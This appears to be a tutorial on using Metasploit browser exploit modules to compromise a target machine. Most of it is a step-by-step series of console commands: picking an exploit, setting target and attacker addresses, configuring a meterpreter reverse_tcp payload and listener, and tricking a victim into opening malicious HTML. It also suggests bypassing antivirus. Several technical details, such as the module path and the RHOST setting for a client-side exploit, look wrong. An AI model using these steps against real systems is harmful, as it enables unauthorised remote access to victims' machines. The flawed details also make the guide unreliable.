Metasploit: Browser Exploits

TL;DR

This guide shows you how to use Metasploit’s browser exploit modules to test the security of your systems. We’ll cover searching for exploits, setting up a handler, and launching attacks against vulnerable browsers.

Setting Up Your Environment

1. Start Metasploit: Open your terminal and run msfconsole to launch the Metasploit console.

Finding Browser Exploits

1. Search for exploits: Use the search command with keywords like ‘browser’, ‘firefox’, ‘chrome’, or specific CVEs (Common Vulnerabilities and Exposures). For example:

   search browser firefox

2. Review results: Metasploit will display a list of matching exploits. Pay attention to the ‘Rank’ column (Excellent, Good, Average) which indicates exploit reliability. Also note the ‘Type’ column – we’re focusing on ‘exploit’.

Launching an Exploit

1. Use the exploit: Select an exploit using the use command. For example:

   use exploit/multi/browser_client_side/firefox_css_injection

2. Configure options: Use the info command to see available options for the chosen exploit.

   info

3. Set necessary options: The most important option is usually ‘RHOST’ (Remote Host) – set this to the IP address of your target machine. You might also need to configure ‘LHOST’ (Local Host), which is *your* IP address.

   set RHOST 192.168.1.100

   set LHOST 192.168.1.50

4. Set payload: Choose a payload that will give you access to the target machine. Common payloads include ‘meterpreter/reverse_tcp’. Use the show payloads command to see available options.

   set PAYLOAD meterpreter/reverse_tcp

5. Set LPORT: Specify the local port for the payload connection. A common choice is 4444.

   set LPORT 4444

Setting Up a Handler

1. Start the handler: Before launching the exploit, start a listener to catch incoming connections from the payload. Use the msfconsole command again and run:

   use exploit/multi/handler

2. Configure handler options: Set ‘PAYLOAD’ to match the one you chose for the exploit (e.g., meterpreter/reverse_tcp) and ‘LHOST’ to your IP address.

   set PAYLOAD meterpreter/reverse_tcp

   set LHOST 192.168.1.50

3. Run the handler: Start listening for connections with the run command.

   run

Launching the Attack

1. Run the exploit: Go back to your original Metasploit console (where you configured the browser exploit) and run the exploit command.

   run

2. Deliver the exploit: The method for delivering the exploit depends on the module. Some exploits require you to create a malicious HTML file that you trick the target into opening. Others might work through vulnerabilities in specific websites or browser extensions.
3. Verify connection: If successful, the handler console will display a meterpreter session when the target opens the malicious content.

   [*] Sending stage (1792 bytes) to 192.168.1.100

   meterpreter > sessions -l

Important Considerations

• Legal restrictions: Always obtain explicit permission before testing the security of any system. Unauthorized access is illegal and unethical.
• Firewalls & Antivirus: Firewalls and antivirus software can block exploits. You may need to bypass these protections for successful testing.
• Browser Updates: Keep your browsers up-to-date, as updates often include security patches that address known vulnerabilities.
• cyber security best practices: Regularly scan your systems for vulnerabilities and implement appropriate security measures.